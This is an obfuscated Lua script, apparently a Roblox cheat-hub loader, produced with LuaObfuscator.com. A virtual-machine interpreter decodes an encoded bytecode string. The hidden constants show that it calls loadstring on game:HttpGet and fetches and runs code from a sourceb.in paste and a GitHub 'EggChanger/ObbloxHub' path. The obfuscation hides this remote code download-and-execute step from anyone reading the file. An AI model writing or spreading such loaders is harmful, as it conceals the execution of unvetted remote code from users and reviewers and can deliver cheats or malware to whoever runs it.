--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v121=v5(v90,v19);v19=nil;return v121;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0;local v92;while true do if (v91==(0 -0)) then v92=(v31/((5 -(1068 -(68 + 997)))^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-((2202 -(226 + 1044)) -(857 + 74)))) + ((2477 -1908) -(367 + 201)))) ;return v92-(v92%((1045 -(32 + 85)) -(214 + 713))) ;end end else local v93=0 + 0 ;local v94;while true do if (v93==(0 + 0)) then v94=(879 -(277 + 5 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or (0 -0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 + 0 ;local v36;local v37;while true do if (v35==(958 -(892 + (159 -94)))) then return (v37 * (610 -354)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + ((3 + 0) -1) );v18=v18 + (352 -(87 + 263)) ;v35=181 -(67 + 113) ;end end end local function v23() local v38=0 -(1187 -(1069 + 118)) ;local v39;local v40;local v41;local v42;while true do if (v38==(952 -(802 + (340 -190)))) then v39,v40,v41,v42=v1(v16,v18,v18 + ((14 -7) -4) );v18=v18 + (6 -(1 + 1)) ;v38=1 + 0 ;end if (v38==((1772 -774) -(915 + 82))) then return (v42 * (47505959 -30728743)) + (v41 * (38178 + 27358)) + (v40 * (336 -80)) + v39 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;local v47=v20(v44,21,473 -(416 + 26) );local v48=((v20(v44,32)==(3 -2)) and  -(1 + (0 -0))) or 1 ;if (v47==(0 -0)) then if (v46==(438 -(145 + 293))) then return v48 * ((1526 -1096) -((903 -(814 + 45)) + 386)) ;else v47=1487 -(998 + 488) ;v45=0 + 0 ;end elseif (v47==2047) then return ((v46==((0 -0) + 0 + 0)) and (v48 * ((773 -(201 + 571))/(1138 -(116 + 1022))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((8 -6)^(31 + 21)))) ;end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(2 + 1)) then return v6(v52);end if (v50==(886 -(261 + 624))) then v51=v3(v16,v18,(v18 + v49) -(1748 -(760 + 987)) );v18=v18 + v49 ;v50=2;end if (v50==2) then v52={};for v113=1 -0 , #v51 do v52[v113]=v2(v1(v3(v51,v113,v113)));end v50=1083 -(1020 + 60) ;end if (v50==(1423 -(630 + 793))) then v51=nil;if  not v49 then local v119=0 -0 ;while true do if (v119==(0 -(1913 -(1789 + 124)))) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=3 -(768 -(745 + 21)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 1767 -(308 + 1459) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v112=(function() return 0;end)();while true do if (v112==(0 -0)) then if (v104==1) then local v124=(function() return 0 -0 ;end)();while true do if (v124~=0) then else while true do if (v95==(0 -0)) then v96=(function() return v97();end)();if (v98(v96, #",", #"\\")~=0) then else local v186=(function() return 867 -(550 + 317) ;end)();local v187=(function() return;end)();local v188=(function() return;end)();local v189=(function() return;end)();local v190=(function() return;end)();while true do if (v186==(2 -0)) then while true do if (v187==(2 -0)) then local v193=(function() return 0 -0 ;end)();while true do if (v193~=0) then else if (v98(v189, #"|", #"]")~= #"<") then else v190[287 -(134 + 151) ]=(function() return v99[v190[2]];end)();end if (v98(v189,2,1667 -(970 + 695) )== #" ") then v190[ #"91("]=(function() return v99[v190[ #"-19"]];end)();end v193=(function() return 1;end)();end if (v193~=(1 -0)) then else v187=(function() return  #"nil";end)();break;end end end if (v187~=(1990 -(582 + 1408))) then else local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (v194~=(0 -0)) then else v195=(function() return 0;end)();while true do if (v195==0) then v188=(function() return v98(v96,2 -0 , #"91(");end)();v189=(function() return v98(v96, #"xnxx",22 -16 );end)();v195=(function() return 1825 -(1195 + 629) ;end)();end if (1==v195) then v187=(function() return  #"|";end)();break;end end break;end end end if ( #"xxx"==v187) then if (v98(v189, #"gha", #"nil")~= #"<") then else v190[ #"http"]=(function() return v99[v190[ #"0836"]];end)();end v100[v101]=(function() return v190;end)();break;end if (v187== #"[") then local v197=(function() return 0 -0 ;end)();local v198=(function() return;end)();while true do if (v197~=0) then else v198=(function() return 0;end)();while true do if (v198==0) then v190=(function() return {v102(),v102(),nil,nil};end)();if (v188==0) then local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if ((241 -(187 + 54))~=v202) then else v203=(function() return 0;end)();while true do if (v203==0) then v190[ #"nil"]=(function() return v102();end)();v190[ #"0313"]=(function() return v102();end)();break;end end break;end end elseif (v188== #">") then v190[ #"asd"]=(function() return v103();end)();elseif (v188==(782 -(162 + 618))) then v190[ #"xxx"]=(function() return v103() -((2 + 0)^16) ;end)();elseif (v188== #"nil") then local v208=(function() return 0;end)();local v209=(function() return;end)();while true do if (v208~=0) then else v209=(function() return 0 + 0 ;end)();while true do if (v209~=0) then else v190[ #"91("]=(function() return v103() -((3 -1)^(26 -10)) ;end)();v190[ #".dev"]=(function() return v102();end)();break;end end break;end end end v198=(function() return 1;end)();end if (v198==(1 + 0)) then v187=(function() return 2;end)();break;end end break;end end end end break;end if (v186~=1) then else local v191=(function() return 1636 -(1373 + 263) ;end)();while true do if (v191~=(1001 -(451 + 549))) then else v186=(function() return 2;end)();break;end if (v191~=(0 + 0)) then else v189=(function() return nil;end)();v190=(function() return nil;end)();v191=(function() return 1 -0 ;end)();end end end if (0==v186) then local v192=(function() return 0;end)();while true do if ((1 -0)~=v192) then else v186=(function() return 1;end)();break;end if (v192==(1384 -(746 + 638))) then v187=(function() return 0 + 0 ;end)();v188=(function() return nil;end)();v192=(function() return 1 -0 ;end)();end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if (v104~=0) then else local v125=(function() return 341 -(218 + 123) ;end)();while true do if (v125==(1582 -(1535 + 46))) then v104=(function() return 1;end)();break;end if (v125==(0 + 0)) then v95=(function() return 0 + 0 ;end)();v96=(function() return nil;end)();v125=(function() return 561 -(306 + 254) ;end)();end end end break;end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();while true do if (v108~=0) then else local v120=(function() return 0;end)();while true do if (v120~=0) then else v105[v106-#"]" ]=(function() return v107();end)();return v105,v106,v107;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"/",v59 do local v69=(function() return 0 + 0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==1) then v72=(function() return nil;end)();while true do if (v70==(0 -0)) then local v122=(function() return 1467 -(899 + 568) ;end)();while true do if (v122==1) then v70=(function() return 1 + 0 ;end)();break;end if (v122==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v122=(function() return 2 -1 ;end)();end end end if (v70==(604 -(268 + 335))) then if (v71== #"}") then v72=(function() return v21()~=0 ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"-19") then v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end end break;end if (v69==(290 -(60 + 230))) then v70=(function() return 572 -(426 + 146) ;end)();v71=(function() return nil;end)();v69=(function() return 1 + 0 ;end)();end end end v58[ #"gha"]=(function() return v21();end)();for v73= #" ",v23() do FlatIdent_C460,Descriptor,v21,v20,v60,v55,v73,v22,v23=(function() return v53(FlatIdent_C460,Descriptor,v21,v20,v60,v55,v73,v22,v23);end)();end for v74= #">",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1457 -(282 + 1174) ];local v66=v62[813 -(569 + 242) ];local v67=v62[8 -5 ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1 + 0 ;local v80= -(1025 -(706 + 318));local v81={};local v82={...};local v83=v12("#",...) -(1252 -((1582 -861) + 530)) ;local v84={};local v85={};for v109=0 + 0 ,v83 do if (v109>=v77) then v81[v109-v77 ]=v82[v109 + ((3063 -1791) -(945 + 326)) ];else v85[v109]=v82[v109 + (2 -(1 + 0)) ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do v87=v75[v79];v88=v87[701 -(271 + 429) ];if (v88<=(5 + 0)) then if (v88<=(2 + 0)) then if (v88<=(1500 -((3098 -(1121 + 569)) + 92))) then v85[v87[1088 -(461 + (2136 -1511)) ]]();elseif (v88>(1289 -((2011 -(697 + 321)) + 295))) then v85[v87[1 + 1 ]]=v87[6 -3 ];else local v132=(1854 -(483 + 200)) -((1881 -(1404 + 59)) + 753) ;local v133;local v134;while true do if (v132==(0 + 0)) then v133=v87[1 + 1 ];v134=v85[v87[1 + 2 ]];v132=1 + 0 ;end if (v132==(2 -1)) then v85[v133 + ((1450 -920) -(406 + 123)) ]=v134;v85[v133]=v134[v87[1773 -(1749 + 20) ]];break;end end end elseif (v88<=(756 -(239 + 514))) then for v128=v87[1 + 1 ],v87[2 + 1 ] do v85[v128]=nil;end elseif ((v88>(1326 -(1249 + 73))) or (3315<=2782)) then v85[v87[1 + 1 ]]=v87[1148 -((626 -160) + 679) ]~=(0 -0) ;else v85[v87[1204 -(373 + 829) ]]=v64[v87[3]];end elseif ((v88<=(19 -(29 -18))) or (876>=2964)) then if (v88<=(17 -11)) then if (v85[v87[1902 -(106 + 1794) ]]==v87[2 + 2 ]) then v79=v79 + (1 -0) + 0 ;else v79=v87[241 -(64 + 174) ];end elseif ((v88==((2 -1) + 6)) or (2232>2497)) then local v139=0 -(562 -(334 + 228)) ;local v140;while true do if (v139==(0 -(0 -0))) then v140=v87[5 -3 ];v85[v140]=v85[v140](v13(v85,v140 + (115 -(4 + 110)) ,v80));break;end end else local v141;local v142,v143;local v144;local v145;v85[v87[586 -(57 + 527) ]]=v64[v87[(557 + 873) -((76 -35) + 1386) ]];v79=v79 + (104 -(17 + 86)) ;v87=v75[v79];v145=v87[2 + 0 ];v144=v85[v87[6 -3 ]];v85[v145 + (2 -1) ]=v144;v85[v145]=v144[v87[(394 -224) -(122 + (79 -35)) ]];v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[2]]=v87[7 -4 ];v79=v79 + (1 -0) ;v87=v75[v79];v85[v87[6 -4 ]]=v87[3 + 0 ]~=0 ;v79=v79 + 1 + 0 ;v87=v75[v79];v145=v87[3 -1 ];v142,v143=v78(v85[v145](v13(v85,v145 + (66 -(30 + 35)) ,v87[1230 -(322 + 905) ])));v80=(v143 + v145) -1 ;v141=0 + 0 ;for v172=v145,v80 do v141=v141 + (1258 -(1043 + 214)) ;v85[v172]=v142[v141];end v79=v79 + (3 -2) ;v87=v75[v79];v145=v87[(1825 -(602 + 9)) -(323 + 889) ];v85[v145]=v85[v145](v13(v85,v145 + (2 -1) ,v80));v79=v79 + ((165 + 416) -((1550 -(449 + 740)) + 219)) ;v87=v75[v79];v85[v87[322 -((289 -(141 + 95)) + 267) ]]();v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[(1287 -(826 + 46)) -(15 + 398) ]]=v64[v87[(1932 -(245 + 702)) -(18 + 947 + 17) ]];v79=v79 + ((9 -6) -2) ;v87=v75[v79];v85[v87[(4 -2) + (0 -0) ]]=v64[v87[(3 + 5) -5 ]];v79=v79 + (1899 -(260 + 1638)) + 0 ;v87=v75[v79];v145=v87[(1292 -(382 + 58)) -(20 + 830) ];v144=v85[v87[3 + 0 ]];v85[v145 + (127 -((372 -256) + 10)) ]=v144;v85[v145]=v144[v87[1005 -(938 + 63) ]];end elseif (v88<=(1 + 8)) then v79=v87[3];elseif ((v88>(748 -(542 + 196))) or (2110<=332)) then local v167=0 -0 ;local v168;local v169;local v170;local v171;while true do if ((3686>3172) and (v167==(1 + 1))) then for v183=v168,v80 do v171=v171 + 1 + 0 + 0 ;v85[v183]=v169[v171];end break;end if ((v167==((0 -0) + 0)) or (4474<820)) then v168=v87[1140 -(650 + 132 + 356) ];v169,v170=v78(v85[v168](v13(v85,v168 + 1 + 0 ,v87[7 -4 ])));v167=2 -1 ;end if ((4279>=2882) and (v167==(1093 -(686 + 289 + 117)))) then v80=(v170 + v168) -((3207 -1655) -(1126 + 425)) ;v171=1875 -(157 + 1718) ;v167=(5 -3) + 0 ;end end else do return;end end v79=v79 + (406 -(118 + 287)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F6F6270414248323354322F30034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6F2Q626C6F782F452Q674368616E6765722F726566732F68656164732F6D61696E2F4F2Q626C6F78487562001B3Q0012023Q00014Q0003000100013Q0026063Q0002000100010004093Q00020001001202000100013Q00260600010005000100010004093Q00050001001204000200023Q001208000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001202000500064Q000B000300054Q000700023Q00024Q0002000100010004093Q001A00010004093Q000500010004093Q001A00010004093Q000200012Q000A3Q00017Q00",v9(),...);
